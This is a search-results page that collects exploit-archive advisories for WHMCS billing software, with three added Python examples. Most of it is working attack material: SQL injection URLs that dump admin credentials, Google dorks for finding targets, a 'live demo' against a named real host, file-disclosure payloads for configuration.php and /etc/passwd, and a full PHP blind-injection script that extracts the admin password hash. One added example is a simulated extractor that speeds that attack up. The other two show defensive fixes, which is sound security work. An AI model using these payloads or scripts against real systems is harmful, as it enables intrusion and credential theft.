whmcs
Search result for 'whmcs'
Islam DefenDers/WHMCS Control SQL Injection ( na)
#=Info=======================================================================#
# Software: WHMCS control (WHMCompleteSolution) Sql Injection
# Vulnerability: Remote Sql Injection
# Google Dork: Powered by WHMCompleteSolution - or " inurl:WHMCS
# Off. site: www.MiXaTy.com
#============================================================================#
#=Author==============================================#
# Author: Islam DefenDers
# Date: 24.04.2010
# Contact: email: hackereg@hotmail.com
#====================================================#
#=Sql Injection=============================================================#
# Exploit: http://site/submitticket.php?step=2&deptid=001' and 1=0 union all select 1,2,3,4,message,6,7,8,9,10 from tbltickets--%20
# DOWNLOAD : http://www.whmcs.com/
# Live demo: http://ste/support/submitticket.php?step=2&deptid=001' and 1=0 union all select 1,2,3,4,username,6,7,8,password,10 from tbladmins--%20
#============================================================================#
#=Greetz==================================#
# IsLam DefenDers Mr.HaMaDa
# HaMaDa SCoOoRPioN - DR.B@HY - MiXaTy TeaM - Islam DefenDers TeaM
# site: www.mixaty.com
# E: hackereg@hotmail.com
#=======================================#
WHMCS Control suffers from a remote SQL injection vulnerability.
Julian A. Rodriguez/whmcs-disclose.txt ( na)
Software: WHMCS V3.7.1
Complete Name: WHM Complete Solution Version 3.7.1
Bug: Information Disclosure
Website of the Software: http://www.whmcs.com/
Author: Julian A. Rodriguez
Contact: julianrdz91@gmail.com

Review:
An attacker can obtain very sensitive information about the server simply by requesting the following path:
/status/index.php?action=phpinfo
This file can be reached without any authentication or authorization check. The output reveals the versions of the installed software, the kernel version, the operating system, the commands available on the server, whether safe mode is on or off, information about the server administrator, the path of the server root, and a lot more information about the server.

Proof of Concept:
http://www.xxxxxxxx.net/status/index.php?action=phpinfo

Note: On the demo site at whmcs.com you cannot reach this section because the files have been removed for security reasons.

-- Julian A. Rodriguez
Website: http://www.nulledcore.com
WHM Complete Solution (WHMCS) version 3.7.1 suffers from an information disclosure vulnerability.
Islam DefenDers/WHMCS Control 2 SQL Injection ( na)
Software: WHMCS control 2 Sql Injection
Vulnerability: Remote Sql Injection
Google Dork: Powered by WHMCompleteSolution - or " inurl:WHMCS or' announcements.php
Off. site: www.MiXaTy.com
Author: Islam DefenDers
Date: 2.5.2010
Contact: email: hackereg@hotmail.com
Sql Injection
Exploit: http://site/announcements.php?id=1' and 1=0 union all select 1,2,concat(email,0x3d,password),username,5 from tbladmins--
DOWNLOAD : http://www.whmcs.com/
Live demo: http://www.jsr-host.com/announcements.php?id=1%27%20and%201=0%20union%20all%20select%201,2,concat%28email,0x3d,password%29,username,5%20from%20tbladmins--
Greetz
IsLam DefenDers Mr.HaMaDa
HaMaDa SCoOoRPioN
site: www.mixaty.com
E: hackereg@hotmail.com
WHMCS Control version 2 suffers from a remote SQL injection vulnerability.
R teen/WHMCS (cart.php) Local File Disclosure ( php)
#Exploit Title : WHMCS (cart.php) Local File Disclosure
#Author : R-t33n
#Product : WHMCS
#Vendor : http://whmcs.com/
#Version : 4.x.x
#Date : 28/12/2011
#Category : Remote , webapps
#Google Dork : use ur mind kid.
#Tested on : windows 2003 , Linux , ubuntu.
#Homepage : http://alb0zz.com/
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
http://127.0.0.1/ [ PATH ] /cart.php?a=[wrong value]&templatefile=[File]%00
http://127.0.0.1/ [ PATH ] /cart.php?a=alb0zz&templatefile=../../../configuration.php%00
Look in the [html] page source for the disclosed file contents.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
____ _ ____ ____ _ _ _ _ _
| _ \ _ __ ___ _ _ __| | |___ \| __ ) / \ | | |__ __ _ _ __ (_) __ _ _ __ | |
| |_) | '__/ _ \| | | |/ _` | __) | _ \ / _ \ | | '_ \ / _` | '_ \| |/ _` | '_ \ | |
| __/| | | (_) | |_| | (_| | / __/| |_) | / ___ \| | |_) | (_| | | | | | (_| | | | | |_|
|_| |_| \___/ \__,_|\__,_| |_____|____/ /_/ \_\_|_.__/ \__,_|_| |_|_|\__,_|_| |_| (_)
#~ Greetz: Red Drag0n_al , Ace Wizard, 0x0 , dA3m0n , The Game , Bl4zE , Autorun , b4ti , Eragon_Al
#./ http://alb0zz.com
red virus/WHMCS 3.x Local File Disclosure ( na)
# Title : WHMCS (clientarea.php) Local File Disclosure
# Author : Red Virus >>>c3o@w.cn
# Product : WHMCS ( WHMCompleteSolution )
# Vendor : http://whmcs.com/
# Date : 11/04/2011
# Version : 3.X.x
# Tested on : linux+apache
# Homepage : www.alm3refh.com
================================================================
http://localhost/[PATH]/clientarea.php?action=[wrong_value]&templatefile=[LFD]%00
http://localhost/[PATH]/clientarea.php?action=red&templatefile=../../configuration.php%00
View the page source to see the disclosed file.
================================================================
Greetz To . >>> alm3refh.com - tryag.cc - joood T3rr0rist & cyb3r-1st & i-Hmx & h311 c0d3 infofst & virus hima & Karar aLShaMi & all alm3refh group ahwak2000 & reno & amr2006 & b0x & ZombiE_KsA
WHMCS version 3.x.x suffers from a local file disclosure vulnerability.
HJauditing Employee Tim/WHMCS Grouppay 1.5 SQL Injection ( na)
#######################################################################
Title: WHMCS grouppay plugin SQL Injection <= 1.5
Author: HJauditing Employee Tim
E-mail: Tim@HJauditing.com
Web: http://hjauditing.com/
Plugin: http://kadeo.com.au/design-and-development/whmcs-dev/whmcs-modules/72-group-pay.html
#######################################################################
============
Introduction
============
We have found a SQL injection inside the Group Pay plugin for WHMCS.
A lot of game hosting companies are using this plugin.
The SQL injection is in the function gp_LoadUserFromHash.
============
Exploits
============
- SQL Injection
grouppay.php?hash=%hash%' and '1'='1
============
Code SQL Injection
============
/modules/addons/group_pay/functions_hash.php
function gp_LoadUserFromHash($hash) {
//Kill the Dashes
$hash = str_replace ( "-", "", $hash );
$result = mysql_query ( "SELECT `id` from tblclients where md5(CONCAT(id,email)) = '$hash'" );
if($result){
$row = mysql_fetch_row ( $result );
return $row [0];
}else{
return false;
}
}
============
Fix
============
/modules/addons/group_pay/functions_hash.php
function gp_LoadUserFromHash($hash) {
//Kill the Dashes
$hash = str_replace ( "-", "", $hash );
$hash = mysql_real_escape_string($hash);
$result = mysql_query ( "SELECT `id` from tblclients where md5(CONCAT(id,email)) = '$hash'" );
if($result){
$row = mysql_fetch_row ( $result );
return $row [0];
}else{
return false;
}
}
#######################################################################
WHMCS Grouppay plugin versions 1.5 and below suffer from a remote SQL injection vulnerability.
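The following is an added example and not the plugin's code or the advisory author's: it reproduces the shape of gp_LoadUserFromHash() against an in-memory SQLite database (standing in for MySQL, with md5() registered as a user function and CONCAT(id,email) written as id || email), runs the advisory's probe against it, and places a hardened lookup beside it. The fix above, mysql_real_escape_string(), does stop this quoted injection, but it needs an open mysql link to work and it does not check that the value is a hash at all; validating the stripped value as exactly 32 hex characters and binding it as a parameter removes the whole class. The table layout and sample rows are constructed.

```python
import hashlib
import re
import sqlite3

# Added example, not the Group Pay plugin's code. SQLite stands in for MySQL;
# md5() is registered as a user function and CONCAT(id,email) becomes id || email.
HASH_RE = re.compile(r"[0-9a-f]{32}")


def client_hash(client_id, email):
    """The value the plugin expects: md5(CONCAT(id,email)) of a tblclients row."""
    return hashlib.md5(f"{client_id}{email}".encode()).hexdigest()


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("md5", 1, lambda s: hashlib.md5(str(s).encode()).hexdigest())
    conn.execute("CREATE TABLE tblclients (id INTEGER PRIMARY KEY, email TEXT)")
    # constructed sample rows
    conn.executemany("INSERT INTO tblclients VALUES (?, ?)",
                     [(7, "alice@example.com"), (8, "bob@example.com")])
    return conn


def gp_load_user_vulnerable(conn, h):
    """Same shape as gp_LoadUserFromHash(): strip dashes, splice the value into the SQL text."""
    h = h.replace("-", "")
    sql = f"SELECT id FROM tblclients WHERE md5(id || email) = '{h}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else False


def gp_load_user_hardened(conn, h):
    """Validate the shape first, then bind the value so it can never become SQL."""
    h = h.replace("-", "")
    if not HASH_RE.fullmatch(h):
        return False
    row = conn.execute("SELECT id FROM tblclients WHERE md5(id || email) = ?", (h,)).fetchone()
    return row[0] if row else False


def demo():
    conn = make_db()
    good = client_hash(7, "alice@example.com")
    # The advisory's probe: a valid hash with a tautology (or a contradiction) appended.
    true_probe = good + "' and '1'='1"
    false_probe = good + "' and '1'='2"
    dashed = "-".join(good[i:i + 8] for i in range(0, 32, 8))   # plugin strips dashes first
    return {
        "vuln_legit": gp_load_user_vulnerable(conn, good),
        "vuln_true_probe": gp_load_user_vulnerable(conn, true_probe),    # still 7: the injected predicate ran
        "vuln_false_probe": gp_load_user_vulnerable(conn, false_probe),  # False: the injected predicate ran
        "hard_legit": gp_load_user_hardened(conn, good),
        "hard_true_probe": gp_load_user_hardened(conn, true_probe),      # rejected before any query is sent
        "hard_dashed": gp_load_user_hardened(conn, dashed),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The pair of probes is the same test the advisory uses: if appending ' and '1'='1 still returns the client while ' and '1'='2 returns nothing, the predicate reached the database. The hardened version returns False for both before executing anything, and still accepts the dash-formatted hash the plugin is designed to take.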
Ahmed Aboul-Ela/WHMCS 4.5.2 SQL Injection ( na)
# Title: WHMCS 4.x SQL Injection Vulnerability
# Google Dork: intext:"Powered by WHMCompleteSolution" OR inurl:"submitticket.php"
# Author: Ahmed Aboul-Ela
# Contact: Ahmed.Aboul3la[at]gmail[dot]com
# Date: 14/5/2013
# Vendor: http://www.whmcs.com
# Version: 4.5.2 and prior versions should be affected too
# Tested on: Linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sql Injection Vulnerability in "/includes/invoicefunctions.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Vulnerable Code Snippet :
LINE 582: function pdfInvoice($id)
LINE 583: {
LINE 686: if ($CONFIG['GroupSimilarLineItems'])
LINE 687: {
LINE 688: $result = full_query('' . 'SELECT COUNT(*),id,type,relid,description,amount,taxed FROM tblinvoiceitems WHERE invoiceid=' . $id . ' GROUP BY `description`,`amount` ORDER BY id ASC');
LINE 689: }
As we can see, the $id argument of pdfInvoice() is concatenated directly into the MySQL query without any sanitization, which leads directly to SQL injection.
pdfInvoice() is called from /dl.php as follows:
LINE 21: if ($type == 'i')
LINE 22: {
LINE 23: $result = select_query('tblinvoices', '', array(
LINE 24: 'id' => $id
LINE 25: ));
LINE 26: $data = mysql_fetch_array($result);
LINE 27: $invoiceid = $data['id'];
LINE 28: $invoicenum = $data['invoicenum'];
LINE 29: $userid = $data['userid'];
LINE 30: if ((!$_SESSION['adminid'] && $_SESSION['uid'] != $userid))
LINE 31: {
LINE 32: downloadLogin();
LINE 33: }
LINE 34: if (!$invoicenum)
LINE 35: {
LINE 36: $invoicenum = $invoiceid;
LINE 37: }
LINE 38: require('includes/clientfunctions.php');
LINE 39: require('includes/countries.php');
LINE 40: require('includes/invoicefunctions.php');
LINE 41: require('includes/tcpdf.php');
LINE 42: $pdfdata = pdfInvoice($id);
LINE 43: header('Pragma: public');
LINE 44: header('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
LINE 45: header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT');
LINE 46: header('Cache-Control: must-revalidate, post-check=0, pre-check=0, private');
LINE 47: header('Cache-Control: private', false);
LINE 48: header('Content-Type: application/octet-stream');
LINE 49: header('Content-Disposition: attachment; filename="' . $invoicenum . '.pdf"');
LINE 50: header('Content-Transfer-Encoding: binary');
LINE 51: echo $pdfdata;
LINE 52: exit();
LINE 53: return 1;
LINE 54: }
As we can see at LINE 42, pdfInvoice() is called with the $id variable without any sanitization, and the generated invoice is then sent to the browser as a PDF download.
Note the check at LINE 30: unless the session is an admin session, or $_SESSION['uid'] matches the userid of the invoice row that select_query() resolves for the supplied id, dl.php calls downloadLogin() first, so the request has to be made with a session that passes that check.
- Proof of Concept for Exploitation
To Dump Administrator Credentials (user & pass):
http://www.site.com/whmcs/dl.php?type=i&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --
~ Result: The browser will prompt to download the PDF invoice; open it and you should find the username and password hash inside :)
- Precondition to Successfully Exploit the Vulnerability:
"Group Similar Line Items" Option should be Enabled at the Invoices Settings in the WHMCS Admin ( It should be Enabled by default )
- Credits:
Ahmed Aboul-Ela - Information Security Consultant @ Starware Group
WHMCS version 4.5.2 suffers from a remote SQL injection vulnerability.
Starware Security Team/WHMCS 4.5.2 Blind SQL Injection ( na)
____ _
/ ___|| |_ __ _ _ __ __ ____ _ _ __ ___
\___ \| __/ _` | '__| \ \ /\ / / _` | '__/ _ \
___) | || (_| | | \ V V / (_| | | | __/
|____/ \__\__,_|_| \_/\_/ \__,_|_| \___|
# Software : WHMCS (WHMCompleteSolution)
# Google Dork: Turn on thinking mode :P
# Date: 10/22/2012
# Author: Starware Security Team [www.Resecure.me]
# Contact Us : Security[@]star-ware.com
# Vendor Homepage: http://www.whmcs.com
# Tested on: WHMCS v4.5.2
# Affected versions: 4.5.x
-----------------------------------------------------
#Vulnerability Exists in : [SCRIPT_DIR]/modules/gateways/callback/googlecheckout.php
#Vulnerable Source Code Snippet :
LINE 11: $xml_response = (isset($HTTP_RAW_POST_DATA) ? $HTTP_RAW_POST_DATA : file_get_contents('php://input'));
LINE 16: $xmldata = XMLtoArray($xml_response);
LINE 19: $ordernumber = $xmldata['CHARGE-AMOUNT-NOTIFICATION']['GOOGLE-ORDER-NUMBER'];
LINE 22: $query = 'SELECT data FROM tblgatewaylog WHERE gateway=\'Google Checkout\' AND data LIKE \'%new-order-notification%' . $ordernumber . '%\'';
#Proof of Concept :
<html>
<head>
<title>WHMCS Blind SQL Injection POC</title>
</head>
<body>
<script>
var params = "<charge-amount-notification><google-order-number>0' %YOUR INJECTION HERE% -- -</google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>";
var http = new XMLHttpRequest();
try {
netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
} catch (e) {
alert("Permission UniversalBrowserRead denied.");
}
http.open("POST", "http://site.com/whmcs/modules/gateways/callback/googlecheckout.php", true);
http.onreadystatechange = handleResponse;
http.send(params);
function handleResponse() {
if(http.readyState == 4 && http.status == 200){
var response = http.responseText;
alert(response);
}
}
</script>
</body>
</html>
#Exploit Code :
<?php
/*
WHMCS Blind SQL Injection Exploit by Starware Security Team.
Usage: php exploit.php URL seconds
*/
set_time_limit(0);
function post_request($url,$post_data,$follow=0) {
$user_agent = 'Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1';
$ch = curl_init();
$timeout = 1;
$execution_timeout = 4;
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
if($follow == 1) curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE );
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
curl_setopt($ch, CURLOPT_HTTPHEADER,array('Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Language: en-us,en;q=0.5','Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7','Keep-Alive: 115','Connection: keep-alive'));
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $execution_timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,$post_data);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
function start_time() {
$time = microtime();
$time = explode(" ", $time);
$time = $time[1] + $time[0];
return $time;
}
function end_time($start) {
$time = microtime();
$time = explode(" ", $time);
$time = $time[1] + $time[0];
$finish = $time;
$totaltime = ($finish - $start);
return round($totaltime);
}
function check_ascii($num,$num2,$num3) {
global $url,$seconds;
$start= start_time();
$injection = "/**/AnD/**/if(ascii(substring((SeLEcT/**/password/**/FROM/**/tbladmins/**/whEre/**/id/**/=/**/1),$num3,1))/**/BETWEEN/**/$num/**/and/**/$num2,/**/BENCHMARK(999999,MD5(NOW()*NOW())),/**/0)/**/-- #";
post_request($url,"<charge-amount-notification><google-order-number>0' $injection </google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>");
if(end_time($start) >= $seconds) return true; else return false;
}
function inject($num,$num2,$num3) {
global $url,$seconds;
for($i=$num;$i<=$num2;$i++) {
$start= start_time();
$injection = "/**/AnD/**/if(ascii(substring((SeLEcT/**/password/**/FROM/**/tbladmins/**/whEre/**/id/**/=/**/1),$num3,1))/**/=/**/$i,/**/BENCHMARK(999999,MD5(NOW()*NOW())),/**/0)/**/-- #";
post_request($url,"<charge-amount-notification><google-order-number>0' $injection </google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>");
if(end_time($start) >= $seconds) { echo chr($i); flush(); }
}
}
function get_password() {
global $url;
for($i=1; $i<=32;$i++) {
if(check_ascii(48,52,$i)) { inject(48,52,$i); }
elseif(check_ascii(53,57,$i)) { inject(53,57,$i); }
elseif(check_ascii(97,101,$i)) { inject(97,101,$i); }
elseif(check_ascii(102,106,$i)) { inject(102,106,$i); }
elseif(check_ascii(107,111,$i)) { inject(107,111,$i); }
elseif(check_ascii(112,116,$i)) { inject(112,116,$i); }
elseif(check_ascii(116,122,$i)) { inject(116,122,$i); }
}
}
if ($argc < 3) {
print "Usage: php ".$argv[0]." URL seconds\r\nExample:\r\nphp ".$argv[0]." http://site.com/whmcs/ 1\r\n-----------------------------------------\r\n";
die;
}
$url = trim($argv[1])."/modules/gateways/callback/googlecheckout.php";
$seconds = trim($argv[2]);
echo "[~] Fetching password right now ... \n"; flush();
echo " >> MD5 Password = "; flush();
get_password();
?>
#################################################################################
Note: to exploit this vulnerability the google checkout payment gateway
should be activated by admin from the whmcs admin panel
~ END OF Disclosure ~
Good Luck :)
#################################################################################
# Starware is a company specialized in the Hosting and Information Security field #
# with a list of high ranked sites, including Mobile operators, using our Hosting #
# and Security Services. #
# #
# "Company Located in Egypt" #
# #
# http://www.star-ware.com #
# #
#################################################################################
WHMCS version 4.5.2 remote blind SQL injection exploit.
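The following is an added example, not the Starware exploit and not WHMCS code. It rebuilds the vulnerable LINE 22 query against an in-memory SQLite database and recovers the 32-character admin hash with the same predicate shape the exploit uses (ascii(substring(...)) BETWEEN lo AND hi, written here with SQLite's unicode()/substr()), but narrows each character by binary search over the 16 hex symbols, which costs exactly 4 oracle calls per character instead of the exploit's range probe followed by a linear scan. Two things are simulated and labelled as such: the oracle is "did the query return a row" rather than the BENCHMARK() delay the exploit measures, and the tbladmins/tblgatewaylog rows are constructed.

```python
import hashlib
import sqlite3

# Added example, not the Starware exploit or WHMCS code. SQLite stands in for
# MySQL (substr()/unicode() for substring()/ascii()); the oracle is boolean
# (row returned or not) where the real exploit measures BENCHMARK() delay.
HEX = "0123456789abcdef"      # tbladmins.password here is a 32-char hex MD5 digest
HASH_LEN = 32
ADMIN_HASH = hashlib.md5(b"secret").hexdigest()   # constructed sample credential


def make_backend():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tbladmins (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE tblgatewaylog (id INTEGER PRIMARY KEY, gateway TEXT, data TEXT)")
    conn.execute("INSERT INTO tbladmins VALUES (1, 'admin', ?)", (ADMIN_HASH,))
    # one previously logged callback, which the LIKE pattern has to match (constructed)
    conn.execute("INSERT INTO tblgatewaylog VALUES (1, 'Google Checkout', "
                 "'<new-order-notification><google-order-number>1001"
                 "</google-order-number></new-order-notification>')")
    return conn


def googlecheckout_callback(conn, ordernumber):
    """LINE 22 of the callback: the order number from the POSTed XML is spliced into a LIKE pattern."""
    sql = ("SELECT data FROM tblgatewaylog WHERE gateway='Google Checkout' "
           "AND data LIKE '%new-order-notification%" + ordernumber + "%'")
    return conn.execute(sql).fetchone() is not None


class BlindExtractor:
    def __init__(self, conn):
        self.conn = conn
        self.requests = 0

    def oracle(self, pos, lo, hi):
        """Exploit's predicate: ascii(substring(password,pos,1)) BETWEEN lo AND hi (admin id 1)."""
        self.requests += 1
        pred = (f"unicode(substr((SELECT password FROM tbladmins WHERE id=1),{pos},1)) "
                f"BETWEEN {lo} AND {hi}")
        # %' closes the LIKE pattern; -- - comments out the trailing %' the code appends
        return googlecheckout_callback(self.conn, "%' AND (" + pred + ") -- -")

    def recover_char(self, pos):
        """Binary search over the 16 hex symbols: always 4 oracle calls per character."""
        lo, hi = 0, len(HEX) - 1
        while lo < hi:
            mid = (lo + hi) // 2
            if self.oracle(pos, ord(HEX[lo]), ord(HEX[mid])):
                hi = mid          # character is in HEX[lo..mid]
            else:
                lo = mid + 1      # character is in HEX[mid+1..hi]
        return HEX[lo]

    def recover_hash(self):
        return "".join(self.recover_char(pos) for pos in range(1, HASH_LEN + 1))


def demo():
    """Returns (recovered hash, number of oracle requests used)."""
    ex = BlindExtractor(make_backend())
    return ex.recover_hash(), ex.requests


if __name__ == "__main__":
    recovered, count = demo()
    print(f"MD5 Password = {recovered} ({count} requests)")
```

Against a real timing oracle the BETWEEN predicate would wrap the BENCHMARK() branch exactly as the exploit does; the request budget is what a binary search changes, 128 calls for the full hash here against up to 12 per character in the linear version.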
AntiSecurity/Joomla J!WHMCS Integrator Local File Inclusion ( na)
============================================================================================================
[o] Joomla Component J!WHMCS Integrator Local File Inclusion Vulnerability
Software : com_jwhmcs version 1.5.0
Vendor : https://client.gohigheris.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/
============================================================================================================
[o] Exploit
http://localhost/[path]/index.php?option=com_jwhmcs&controller=[LFI]
[o] PoC
http://localhost/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00
============================================================================================================
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
============================================================================================================
[o] April 06 2010 - GMT +07:00 Jakarta, Indonesia
The Joomla J!WHMCS Integrator component version 1.5.0 suffers from a local file inclusion vulnerability.
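All three file-disclosure and inclusion entries above (cart.php and clientarea.php templatefile, com_jwhmcs controller) share one root cause: a user-supplied name is joined onto a directory, an extension is appended, and a %00 in the value truncates the string before the extension, leaving a traversal path. The following is an added example, not WHMCS, J!WHMCS or Joomla code: a hypothetical resolver that shows the naive join escaping the template directory with the page's own payload, and a hardened one that rejects NUL bytes, allows only a plain name, and confirms the resolved path is still inside the base directory. The directory layout and file contents are constructed.

```python
import os
import re
import tempfile

# Added example, not WHMCS, J!WHMCS or Joomla code. resolve_template() and
# naive_template_path() are hypothetical names for the two behaviours compared.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def naive_template_path(base_dir, name, ext=".tpl"):
    """The vulnerable pattern: join, append the extension, and let a NUL byte cut
    the string short (PHP before 5.3.4 handed such paths to the C library, which
    stops at the NUL, so the appended '.tpl' was never seen)."""
    path = os.path.join(base_dir, name + ext)
    return os.path.normpath(path.split("\x00", 1)[0])


def resolve_template(base_dir, name, ext=".tpl"):
    """Return the real path of base_dir/<name><ext>, or None if the name is rejected."""
    if "\x00" in name:                    # the %00 the PoCs rely on
        return None
    if not NAME_RE.fullmatch(name):       # no '/', no '..', no extension of its own
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name + ext))
    if os.path.commonpath([base, candidate]) != base:   # defence in depth (symlinks)
        return None
    return candidate if os.path.isfile(candidate) else None


PAYLOADS = [
    "../../../configuration.php\x00",                   # cart.php PoC
    "../../configuration.php\x00",                      # clientarea.php PoC
    "../../../../../../../../../../etc/passwd\x00",     # com_jwhmcs PoC
]


def demo():
    with tempfile.TemporaryDirectory() as root:
        root = os.path.realpath(root)
        tpl_dir = os.path.join(root, "templates", "default")
        os.makedirs(tpl_dir)
        with open(os.path.join(tpl_dir, "viewcart.tpl"), "w") as f:
            f.write("legitimate template")
        with open(os.path.join(root, "configuration.php"), "w") as f:
            f.write("<?php $db_password = 'constructed-secret';")   # the file the PoCs read

        # two directories up from templates/default is the install root, as in the clientarea.php PoC
        naive = naive_template_path(tpl_dir, PAYLOADS[1])
        return {
            "naive_escapes_base": not naive.startswith(tpl_dir + os.sep) and os.path.isfile(naive),
            "hardened_rejects_all": all(resolve_template(tpl_dir, p) is None for p in PAYLOADS),
            "hardened_rejects_plain_traversal": resolve_template(tpl_dir, "../../configuration.php") is None,
            "hardened_accepts_legit": resolve_template(tpl_dir, "viewcart") is not None,
        }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The order of checks matters: the allow-list alone already removes traversal and the NUL, and the realpath/commonpath comparison is there so that a symlink inside the template directory cannot point the resolved file outside it.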